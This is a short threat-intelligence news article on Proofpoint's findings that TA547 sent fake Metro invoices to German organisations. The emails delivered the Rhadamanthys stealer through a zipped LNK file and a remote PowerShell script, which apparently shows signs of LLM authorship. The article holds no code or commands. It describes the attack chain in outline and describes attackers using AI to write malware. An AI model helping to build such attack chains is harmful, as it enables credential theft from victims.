Signs of AI In PowerShell Script Distributing Rhadamanthys Stealer

Analysis of a PowerShell script has revealed the possible use of AI in its creation, according to researchers at Proofpoint, who attribute the activity to the initial access broker, TA547 (aka Scully Spider). This group has launched an email campaign targeting German organizations to disseminate the Rhadamanthys information stealer, evidence of another expansion in TA547’s toolset. The email campaign impersonates communications from the established Metro retail company, including fabricated invoices to lure victims. Proofpoint's researchers also identified that TA547's attacks span the United States, Austria, Spain, and Switzerland.

This attack unfolds as unsuspecting recipients trigger a concealed LNK file within a seemingly benign zip file, subsequently triggering PowerShell to deploy a remote script. This script's clean and articulate comments indicate the likelihood of AI involvement in its generation. Proofpoint notes, "Specifically, the PowerShell script included a pound sign followed by grammatically correct and hyper specific comments above each component of the script. This is a typical output of LLM-generated coding content, and suggests TA547 used some type of LLM-enabled tool to write (or rewrite) the PowerShell, or copied the script from another source that had used it." TA547, an initial access broker with a financial agenda, is known for its geographical diversity in targeting and a shifting preference for delivery mechanisms, now opting for compressed LNK files over previous JavaScript attachments.

Proofpoint's findings reinforce the continued evolution of tactics in cybercriminal strategy, potentially incorporating advanced AI-generated scripts into complex attack chains. Using AI in scriptwriting does not fundamentally change the malware's function or threat level but signifies the adversaries' evolving sophistication. Furthermore, detection insights captured by Proofpoint provide context on activity from another initial access broker, TA577 with recent activities, mentioning the group's attempts to capture NTLM authentication hashes in February 2024 and engage in post-compromise operations beyond their traditional IAB role.